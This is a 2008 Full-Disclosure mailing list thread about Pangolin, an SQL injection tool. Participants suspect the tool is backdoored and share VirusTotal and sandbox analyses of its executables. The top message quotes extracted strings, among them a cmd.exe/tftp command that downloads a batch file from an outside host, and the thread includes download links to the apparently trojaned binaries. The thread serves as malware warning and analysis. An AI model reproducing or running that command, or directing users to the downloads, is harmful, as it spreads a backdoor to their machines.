Just some interesting strings and such: pdf_poc.exe: http://analysis.seclab.tuwien.ac.at/result.php?taskid=024c7616e34fe444398545b69c829e1d&refresh=1
..\\..\\..\\..\\windows\\system32\\cmd.exe ..\\..\\..\\..\\windows\\system32\\tftp.exe -i zwell.3322.org a.bat Cpdf_poc.txt Cpdf_poc.txt Cpdf_poc.txt www.w3.org ns.adobe.com purl.org Cpdf_poc.txt ns.adobe.com ns.adobe.com Cpdf_poc.txt Cpdf_poc.txt http://www.w3.org/1999/02/22-rdf-syntax-ns#";> http://ns.adobe.com/xap/1.0/";> http://purl.org/dc/elements/1.1/";> http://ns.adobe.com/xap/1.0/mm/";> http://ns.adobe.com/pdf/1.3/";> zps.exe: http://analysis.seclab.tuwien.ac.at/result.php?taskid=f43b645dd1308b141193037d163a0731&refresh=1 demon.exe: http://analysis.seclab.tuwien.ac.at/result.php?taskid=8af6928a2eb9de7439fe869984ab1583&refresh=1 DnsQuery_A So much for not doing anything illegal with the software, this guy goes and does illegal things for you. 2008/3/26 Russ McRee <[EMAIL PROTECTED]>: > http://www.nosec.org/web/files/demon.exe > http://www.virustotal.com/analisis/0bfb9d08a2dfe0ad413d08491d0a82a3 > > http://www.nosec.org/web/files/pdf_poc.exe > http://www.virustotal.com/analisis/d619319b2c4a7c5bb3a81adf25bf6559 > > http://www.nosec.org/web/files/zps.exe > http://www.virustotal.com/analisis/26d6e7ff7aa79d20331906543a73d458 > > > > On Wed, Mar 26, 2008 at 10:54 AM, josh <[EMAIL PROTECTED]> wrote: > > Not me, although I did looked at it. I thought great, kiddies are going to > love this > > Sent from my BlackBerry(R) smartphone with SprintSpeed > > > > > > > > > > -----Original Message----- > > From: davidrook <[EMAIL PROTECTED]> > > > > Date: Wed, 26 Mar 2008 17:23:03 > > To:Razi Shaban <[EMAIL PROTECTED]> > > Cc:[email protected], [EMAIL PROTECTED] > > Subject: Re: [Full-disclosure] Pangolin v1.2.590 - The best SQL > > injector you've ever seen > > > > > > I wonder how many readers of this list now have a backdoor on their > > machine........... > > > > Razi Shaban wrote: > > > Hmm... > > > Backdoors eh? > > > > > > Nice try. > > > > > > -- > > > razi > > > > > > On 3/26/08, A. Ramos <[EMAIL PROTECTED]> wrote: > > > > > >> Take a look over: > > >> http://www.virustotal.com/analisis/0603d534b0128bf81ec57a8ab00e145c > > >> > > >> > > >> > > >> 2008/3/26 <[EMAIL PROTECTED]>: > > >> > > >> > > >> > > > >> > > > >> > > > >> > Pangolin is a GUI tool running on Windows to perform as more as > possible > > >> > pen-testing through SQL injection. This version now supports > following > > >> > databases and operations: > > >> > > > >> > * MSSQL : Server informations, Datas, CMD execute, Regedit, Write > file, > > >> > Download file, Read file, File Browser... > > >> > * MYSQL : Server informations, Datas, Read file, Write file... > > >> > * ORACLE : Server informations, Datas, Accounts cracking... > > >> > * PGSQL : Server informations, Datas, Read file... > > >> > * DB2 : Server informations, Datas, ... > > >> > * INFORMIX : Server informations, Datas, ... > > >> > * SQLITE : Server informations, Datas, ... > > >> > * ACCESS : Server informations, Datas, ... > > >> > * SYBASE : Server informations, Datas, ... > > >> > etc. > > >> > > > >> > And supports: > > >> > * HTTPS support > > >> > * Pre-Login > > >> > * Proxy > > >> > * Specify any HTTP headers(User-agent, Cookie, Referer and so on) > > >> > * Bypass firewall setting > > >> > * Auto-analyzing keyword > > >> > * Detailed check optio ns > > >> > * Injection-points management > > >> > etc. > > >> > > > >> > What's the differents to the others? > > >> > * Easy-of-use : What I try to do is making pen-tester more care > about > > >> > result, not the process. All you should do is clicking the buttons. > > >> > * Amazing Speed : so many people told you things about brute sql > injection, > > >> > is it really necessary? Forget char-by-char, we can row-by-row(of > cource, > > >> > not every injection-point can do this)? > > >> > * The exact check mothod : do you really think automated tools like > > >> > AWVS,APPSCAN can find all injection-points? > > >> > > > >> > So, whatever, just check it out, and then enjoy your feeling ;) > > >> > More information : http://www.nosec.org/web/index.php?q=pangolin > > >> > Download : http://seclab.nosec.org/security/pangolin_bin.rar > > >> > > > >> > Declare: Pangolin is designed for security testing by pen-tester > when he has > > >> > been authorized. DO NOT attack any website viciously or accept the > > >> > consequences!!! > > >> > > > >> > > > >> > > > >> > ________________________________ > > >> > > > >> > 2008年薪水翻倍技巧 > > >> > *用搜狗拼音写邮件,体验更流畅的中文输入>> > > >> > > >> > > >>> _______________________________________________ > > >>> > > >> > Full-Disclosure - We believe in it. > > >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > >> > Hosted and sponsored by Secunia - http://secunia.com/ > > >> > > > >> > > >> > > >> > > >> > > >> -- > > >> Alejandro Ramos / Alex -- ([EMAIL PROTECTED]) > > >> molling://CISSP/GWAS/CISA > > >> http://www.unsec.net > > >> > > >> _______________________________________________ > > >> Full-Disclosure - We believe in it. > > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > >> Hosted and sponsored by Secunia - http://secunia.com/ > > >> > > >> > > >> > ------------------------------------------------------------------------ > > >> > > >> _______________________________________________ > > >> Full-Disclosure - We believe in it. > > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > -- > > David Rook | [EMAIL PROTECTED] > > Information Security Analyst > > > > Realex Payments > > Enabling thousands of businesses to sell online. > > > > Realex Payments, Dublin, www.realexpayments.com > > Castlecourt, Monkstown Farm, Monkstown, Co Dublin, Ireland > > Tel: +353 (0)1 2808 559 Fax: +353 (0)1 2808 538 > > > > Realex Payments, London, www.realexpayments.co.uk > > 1 Hammersmith Grove, London W6 0NB, England > > Tel: +44 (0)203 178 5370 Fax: +44 (0)207 691 7264 > > > > Pay and Shop Limited, trading as Realex Payments has its registered office > at Castlecourt, Monkstown Farm, Monkstown, Co Dublin, Ireland and is > registered in Ireland, company number 324929. > > > > This mail and any documents attached are classified as confidential and > > are intended for use by the addressee(s) only unless otherwise > > indicated. If you are not an intended recipient of this email, you must > > not use, disclose, copy, distribute or retain this message or any part > > of it. If you have received this email in error, please notify us > > immediately and delete all copies of this email from your computer > > system(s). > > -- > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > -- > Russ McRee, GCIH, GCFA, CISSP > 425-518-6998 cell > holisticinfosec.org > blog.holisticinfosec.org > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
